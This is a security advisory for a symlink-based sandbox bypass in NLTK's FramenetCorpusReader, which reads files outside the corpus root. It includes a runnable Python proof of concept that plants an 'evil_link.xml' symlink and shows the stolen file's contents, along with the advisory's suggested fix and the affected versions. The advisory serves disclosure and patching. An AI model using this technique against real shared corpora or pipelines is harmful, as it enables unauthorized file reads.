NLTK: Symlink-based sandbox bypass in FramenetCorpusReader (bypasses the fix for CVE-2026-54292)
🔗 CVE IDs covered (1)
📋 Description
This is a new, distinct vulnerability: a bypass of the fix already published as GHSA-xh95-f55m-82fw ("Path traversal in NLTK FramenetCorpusReader.frame() allows arbitrary XML file read, bypassing the nltk.pathsec sandbox"), not a duplicate of it.
Summary
The original advisory was fixed (PR #3581) by adding _reject_unsafe_path_component(), which blocks literal /, \, .., and Windows drive prefixes in caller-/corpus-supplied names. It never resolves symlinks. All three call sites that use this guard still resolve the resulting path through self.abspath() (nltk/corpus/reader/api.py, self._root.join(fileid)), which is a plain lexical join, not the symlink-resolving, required_root-scoped check that CorpusReader.open() (and NKJPCorpusReader's own fix for its sibling advisory) correctly use elsewhere in this same codebase.
A symlink placed inside the corpus's own subdirectory, with a name containing no separators at all, passes the guard cleanly and reads a file completely outside the corpus root.
Affected code (nltk/corpus/reader/framenet.py)
frame_by_name()reads<frame_dir>/<name>.xml_lu_file()reads<lu_dir>/lu<id>.xmldoc()reads<fulltext_dir>/<filename>
All three follow the same chain: _reject_unsafe_path_component(value, ...), then self.abspath(os.path.join(subdir, value)), then XMLCorpusView(...), opened via PathPointer.open() with no required_root.
Proof of concept
Self-contained, runnable end to end.
import os
import tempfile
from nltk.corpus.reader.framenet import FramenetCorpusReader
root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "framenet_v17")
frame_dir = os.path.join(corpus_root, "frame")
secret_dir = os.path.join(root, "outside_framenet_root")
os.makedirs(frame_dir)
os.makedirs(secret_dir)
with open(os.path.join(corpus_root, "frRelation.xml"), "w") as f:
f.write("<frameRelations/>")
secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
f.write(
'<frame cBy="000" cDate="01/01/2000" name="StolenFrame" ID="999999">'
"<definition>THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT</definition>"
"</frame>"
)
# Attacker plants this inside <corpus_root>/frame/. No path separators,
# so it passes _reject_unsafe_path_component cleanly.
link_path = os.path.join(frame_dir, "evil_link.xml")
os.symlink(secret_path, link_path)
reader = FramenetCorpusReader(corpus_root, [])
reader._frame_idx = {"__dummy__": {"name": "__dummy__"}} # skip unrelated index build
result = reader.frame_by_name("evil_link") # normal, routine call, no ".." anywhere
print("frame name:", result["name"])
print("definition:", result["definition"])
Actual output when run against unpatched main (commit 35813c8):
frame name: StolenFrame
definition: THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT
That content was read from secret_path, a file entirely outside corpus_root, via a single, unmodified, public API call. No exception is raised anywhere in the chain; _reject_unsafe_path_component passes because "evil_link" contains no separators, .., or drive prefix.
Verified the same way for the other two affected call sites, _lu_file() (lu<id>.xml symlink under lu/) and doc() (arbitrary filename symlink under fulltext/), both succeeding identically with no exception raised.
Why this is in scope
- No malicious file for a victim to open, no special user interaction. Just a tampered/shared corpus directory (NLTK's own
SECURITY.mdnames "shared environments... multi-tenant pipelines" as its threat model) plus a completely normal API call. - Core corpus-reader code, not a demo/GUI tool.
- Confirmed unintentional: PR #3581's own description states the goal was to route through "the
nltk.pathsecsandbox... including the strictENFORCE=Truemode" and be "consistent with the validation already used elsewhere in NLTK." It doesn't achieve that, sinceabspath()never reaches the scoped, symlink-resolving check that exists and is used correctly elsewhere in the same file tree (NKJPCorpusReader).
Suggested fix
Route all three call sites through CorpusReader.open() (or pass required_root=self._root to validate_path() directly, as NKJPCorpusReader already does), instead of self.abspath() plus raw PathPointer.open().
🎯 Affected products1
- pip/nltk:>= 3.10.0, < 3.10.2
🔗 References (8)
- https://github.com/nltk/nltk/security/advisories/GHSA-f833-7jw8-xwrv
- https://nvd.nist.gov/vuln/detail/CVE-2026-62384
- https://github.com/nltk/nltk/pull/3726
- https://github.com/nltk/nltk/commit/736d3212a47de2005b85b785dde6720556d3925d
- https://github.com/nltk/nltk/releases/tag/v3.10.2
- https://github.com/pypa/advisory-database/tree/main/vulns/nltk/PYSEC-2026-3789.yaml
- https://www.vulncheck.com/advisories/nltk-framenetcorpusreader-symlink-sandbox-bypass-before
- https://github.com/advisories/GHSA-f833-7jw8-xwrv